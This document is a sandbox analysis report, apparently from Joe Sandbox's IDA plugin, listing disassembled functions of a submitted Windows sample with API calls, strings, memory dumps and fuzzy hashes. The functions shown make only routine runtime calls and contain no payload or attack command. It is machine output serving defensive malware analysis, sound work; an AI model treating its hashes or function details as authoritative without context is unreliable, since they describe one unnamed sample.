Part of subcall function 004E61F6: LeaveCriticalSection.KERNEL32(00643728,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E624F
Part of subcall function 004E61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004E124C,00000010,00000008,004DF8A5,004DF83C,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E625F

GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 0055BDF7
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 0055BE09

Strings

s`, xrefs: 0055BDB6
DragDelay, xrefs: 0055BDFE
windows, xrefs: 0055BDF1, 0055BDF6, 0055BE03
DragMinDist, xrefs: 0055BDEC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: s`$DragDelay$DragMinDist$windows
API String ID: 3965097884-3886846763
Opcode ID: 1dbe7102a4832671b5d9de12de529c9f50f243172d3b427ab81a02ba0934f2a5
Instruction ID: 6d4cb5bbd95b8102afeb4acec472da06d6dd97a8bb4d8c30cba0d757bc6a0da0
Opcode Fuzzy Hash: 1dbe7102a4832671b5d9de12de529c9f50f243172d3b427ab81a02ba0934f2a5
Instruction Fuzzy Hash: 9B015AB49847409EE728AF67C846A0AFAE9BFA1700F40260FF1459B6A1C7F46401CF45

Function 004D1B60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

oem, xrefs: 004D1CBD
vector<T> too long, xrefs: 004D1FDB
*.*, xrefs: 004D1C15
4)b, xrefs: 004D1BAC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: *.*$4)b$oem$vector<T> too long
API String ID: 0-954515597
Opcode ID: 389ad698b8a0e067f61e316d01684a098e96ee30b06ba3c131904bdf1b697264
Instruction ID: 4666f5621598f72e3f72d89d72da040041907fbd7406fb22d25d8609f9cc6897
Opcode Fuzzy Hash: 389ad698b8a0e067f61e316d01684a098e96ee30b06ba3c131904bdf1b697264
Instruction Fuzzy Hash: 8C91D330A00605ABCB04DFA9C865BAEB7B5FF55324F14825FE8119B3E1DB74AA04CB94

Function 004DF00F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 004DF042
SetLastError.KERNEL32(0000006F,?,?), ref: 004DF059
CreateActCtxWWorker.KERNEL32(?,?,?), ref: 004DF0A1
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 004DF0BF
CreateActCtxWWorker.KERNEL32(00000020,?,?), ref: 004DF0E1

Strings

, xrefs: 004DF083

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CreateWorker$ErrorFileLastModuleName
String ID:
API String ID: 3218422885-3916222277
Opcode ID: 097efd26d1335cb0af2151ca0d09b0e5034d42aaba275eff19e6502befa0dcc1
Instruction ID: d8ec78037e107f7ab7d65e459b886388d2f27f4511e930778e7196676148fc51
Opcode Fuzzy Hash: 097efd26d1335cb0af2151ca0d09b0e5034d42aaba275eff19e6502befa0dcc1
Instruction Fuzzy Hash: 90213A708002189EDB20DF65DC987EAB7F8BF54324F1046AFD06AE3290DB785A89DF51

Function 005CF91B Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 005CF929

Part of subcall function 005CE4B1: __FF_MSGBANNER.LIBCMT ref: 005CE4CA
Part of subcall function 005CE4B1: __NMSG_WRITE.LIBCMT ref: 005CE4D1
Part of subcall function 005CE4B1: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056), ref: 005CE4F6

_free.LIBCMT ref: 005CF93C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 401224a26dbb12a84de465807c0920c1ff155066d599c3f97c3fe6986e98f0a7
Instruction ID: cbf0a2314c4c0358acf94fd10342d8150b0c60dbb6fbd86eeb5464ad229d61d6
Opcode Fuzzy Hash: 401224a26dbb12a84de465807c0920c1ff155066d599c3f97c3fe6986e98f0a7
Instruction Fuzzy Hash: 4C113036904616BFCF312BF4AC09F6D3E56BB953B0B21543EF85997190DE3499809790

Function 004D1FF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 244
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 004D2089
SetupFindFirstLineW.SETUPAPI(00000000,Manufacturer,00000000,?), ref: 004D2151
SetupCloseInfFile.SETUPAPI(00000000), ref: 004D220A

Strings

Manufacturer, xrefs: 004D214B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Setup$File$CloseFindFirstLineOpen
String ID: Manufacturer
API String ID: 4028048665-624639268
Opcode ID: ea87ab99fd255cf42b6a05c2ffe966258ba849457cf8e2a5de54929a4e7db0f1
Instruction ID: 1d2ba3b01820508ee9eebf8ed6d9aa910ba6dbe384fcd2420cf8a7f5e13956e2
Opcode Fuzzy Hash: ea87ab99fd255cf42b6a05c2ffe966258ba849457cf8e2a5de54929a4e7db0f1
Instruction Fuzzy Hash: 569168702047019FD304CB2DC896A1AB7E5AFEA324F14875EF465873E1DB75E805CB96

Function 005E86C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xfsopen.LIBCPMT ref: 005E867B
std::_Xfsopen.LIBCPMT ref: 005E8697
_fseek.LIBCMT ref: 005E86AE

Strings

t!b, xrefs: 005E8623

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xfsopenstd::_$_fseek
String ID: t!b
API String ID: 1675860589-2207910921
Opcode ID: 6295cb5da1a8d7cdf90af1bd1d60a4775eac88fb27e622108af80d6926d93e73
Instruction ID: 8b325a6c1c05199629a5ac2a01b7ec1455b18988bb872233bd722ff868c053af
Opcode Fuzzy Hash: 6295cb5da1a8d7cdf90af1bd1d60a4775eac88fb27e622108af80d6926d93e73
Instruction Fuzzy Hash: 0911E372A01696ABDB3D0A579C06F7B3E8ABB60790F180034FECD95191EF61DD028689

Function 004DD20C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004DD233
_wcslen.LIBCMT ref: 004DD248

Strings

\, xrefs: 004DD24D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: DirectorySystem_wcslen
String ID: \
API String ID: 2940219301-2967466578
Opcode ID: 3e1c307706e6b8ab0e7cb2607dcbe947eaf186c472e9bc0dc0a80fd905a67e1d
Instruction ID: 5dd9e5017c69726cb11dff4508728f977c9a3b2d31606699d32eb1ff12851ee6
Opcode Fuzzy Hash: 3e1c307706e6b8ab0e7cb2607dcbe947eaf186c472e9bc0dc0a80fd905a67e1d
Instruction Fuzzy Hash: 4D019271D0011DAACF20DAB59C5DEEB7BBDBF55310F0408AFB808D3241E678DA88CA54

Function 00547C0E Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00547C15
CreateCompatibleDC.GDI32(00000000), ref: 00547CE0
CreateCompatibleDC.GDI32(00000000), ref: 00547CEC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CompatibleCreate$H_prolog3
String ID:
API String ID: 2193723985-0
Opcode ID: ac828f6884778756816aa1e756418d68c0f2a18b8f8236347b87c42be1dcd776
Instruction ID: ac9028301b84d1e0c08523c58d0ada0e8d9167ade2b7cad2edb48a32b99e2012
Opcode Fuzzy Hash: ac828f6884778756816aa1e756418d68c0f2a18b8f8236347b87c42be1dcd776
Instruction Fuzzy Hash: E451CDB09217258FCB44DF29C58129A7FA5BF09B00F1081AFEC49DF25ADBB48545CF95

Function 004D4120 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 004D5200: std::_Lockit::_Lockit.LIBCPMT ref: 004D5211

Part of subcall function 004D67F0: std::_Lockit::_Lockit.LIBCPMT ref: 004D681D
Part of subcall function 004D67F0: std::_Lockit::_Lockit.LIBCPMT ref: 004D6840

std::_Lockit::_Lockit.LIBCPMT ref: 004D41A9

Strings

.\uninstall.log, xrefs: 004D4155

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID: .\uninstall.log
API String ID: 3382485803-3792079071
Opcode ID: d805373eabe661b02126e2ed3a6f3d4ae1036338666cb37bb4ba8376c14a689b
Instruction ID: 0cc5a9d52f6be4365506c42b7d70efb97af8c8b2b93cfc6fbd21dc9ef2d1a0ee
Opcode Fuzzy Hash: d805373eabe661b02126e2ed3a6f3d4ae1036338666cb37bb4ba8376c14a689b
Instruction Fuzzy Hash: 9F21FB71B40615ABC710DF29DC52B5EB7A4FB85724F10032BF829E77C0DB39A904C695

Function 004D8C10 Relevance: 3.1, APIs: 2, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004DACC7: __CxxThrowException@8.LIBCMT ref: 004DACDD

_memmove_s.LIBCMT ref: 004D8CDA

Part of subcall function 004D8C10: _memcpy_s.LIBCMT ref: 004D8CE7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Exception@8Throw_memcpy_s_memmove_s
String ID:
API String ID: 1845472808-0
Opcode ID: 5879b019c18efdeebd3e6a91d46a76811754c6cbb10e6172916d71fe858b583b
Instruction ID: 1a91fb1cc1230f90c7c51f8663fae014e1ba08a24a09f07f6c3e84337d049c28
Opcode Fuzzy Hash: 5879b019c18efdeebd3e6a91d46a76811754c6cbb10e6172916d71fe858b583b
Instruction Fuzzy Hash: 2D31C731611504DFC700DF69C8A9D3AF3A9EF94714B10855FF9089B311DE39BD508BA8

Function 004DF2C1 Relevance: 3.1, APIs: 2, Instructions: 68COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004DF2C8
RtlReleaseActivationContext.NTDLL(?,00000004,004DF3DB), ref: 004DF34C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ActivationContextH_prolog3Release
String ID:
API String ID: 1979592854-0
Opcode ID: a0322850799cc5f053977acf071f6c5b481a21e353f13c9be7d4136faf6d551e
Instruction ID: b112fc12682a034cdfc5436cfe8e8ce0948f78d8c138782ef961febae7ad9a0f
Opcode Fuzzy Hash: a0322850799cc5f053977acf071f6c5b481a21e353f13c9be7d4136faf6d551e
Instruction Fuzzy Hash: 63211934201A018FDB29DF79C4A8E2AB7F0BF89715715456EE5A3CB770CB34A805DB14

Function 004DA2C5 Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2D3
SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2DB

Part of subcall function 004DF00F: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 004DF042
Part of subcall function 004DF00F: SetLastError.KERNEL32(0000006F,?,?), ref: 004DF059

Part of subcall function 004DA0E9: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,00000000), ref: 004DA126
Part of subcall function 004DA0E9: PathFindExtensionW.SHLWAPI(?,?,?,00000000), ref: 004DA140
Part of subcall function 004DA0E9: __wcsdup.LIBCMT ref: 004DA18A
Part of subcall function 004DA0E9: __wcsdup.LIBCMT ref: 004DA1C8
Part of subcall function 004DA0E9: __wcsdup.LIBCMT ref: 004DA1FC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Error__wcsdup$FileModeModuleName$ExtensionFindLastPath
String ID:
API String ID: 972848482-0
Opcode ID: 5a85b10c31fd73e421d363392806007da4aa839ac4eb3270293196bb009c4ef6
Instruction ID: 0292819e10ddf56fed2c231c15b371635e9b2a078b4fae245a30b8457694314f
Opcode Fuzzy Hash: 5a85b10c31fd73e421d363392806007da4aa839ac4eb3270293196bb009c4ef6
Instruction Fuzzy Hash: FAF0AF70A102544FCB60FF66D415B6D3B98AF04718B05406FF8098B362CB78D800DBAA

Function 005CE05B Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629

__lock_file.LIBCMT ref: 005CE0A2

Part of subcall function 005CD549: __lock.LIBCMT ref: 005CD56E

__fclose_nolock.LIBCMT ref: 005CE0AD

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 4596504745a05e8c60ad50d7fdd233d98f68db55239c8cd96ba9a418a20567c7
Instruction ID: 1f5179374e0055c7f649358b6b4c36612a780e4f233a29b32494cb38d46ba3d2
Opcode Fuzzy Hash: 4596504745a05e8c60ad50d7fdd233d98f68db55239c8cd96ba9a418a20567c7
Instruction Fuzzy Hash: 2EF06D718117069ED720ABF9E80FF6E7EA07F80334F24821DE421AA1D1C7B88A019F95

Function 004E0431 Relevance: 3.0, APIs: 2, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E0438
GetWindowDC.USER32(00000000,00000004,004DE19D,00000000,?,?,00605254), ref: 004E0464

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Window
String ID:
API String ID: 616115145-0
Opcode ID: caf85769d0406cc3cf12370513d10d36bc3d93aa40144fd43e601baff3f9f825
Instruction ID: 76ac9565a3216892e42dcc8ed089604dac01079e8c37063cdfac7b63601f934d
Opcode Fuzzy Hash: caf85769d0406cc3cf12370513d10d36bc3d93aa40144fd43e601baff3f9f825
Instruction Fuzzy Hash: 6FF012B06007058FCB64EF79C50572B7AE0FF48705710482EA59AC7741EB749940CB59

Function 004D94E4 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504
LoadLibraryW.KERNELBASE(?), ref: 004D951B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ActivateLibraryLoad
String ID:
API String ID: 389599620-0
Opcode ID: c5b020f090ac0eda3bb536ea9c65b0016f663521bf267c18a33a725ea44678c9
Instruction ID: 04ead399604285edddff4cfb0e19d51d2754a19bbc855dd540cd7fbf84378971
Opcode Fuzzy Hash: c5b020f090ac0eda3bb536ea9c65b0016f663521bf267c18a33a725ea44678c9
Instruction Fuzzy Hash: 35F0FE72D00219EECF11AFA1EC15AAEBB71BB48750F504537F415E2261CB788902DB54

Function 005CEB8B Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 005CEB93

Part of subcall function 005CEB60: GetModuleHandleW.KERNEL32(mscoree.dll,?,005CEB98,?,?,005CE4E0,000000FF,0000001E,00000001,00000000,00000000,?,005D4298,?,00000001,?), ref: 005CEB6A
Part of subcall function 005CEB60: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005CEB7A

ExitProcess.KERNEL32 ref: 005CEB9C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
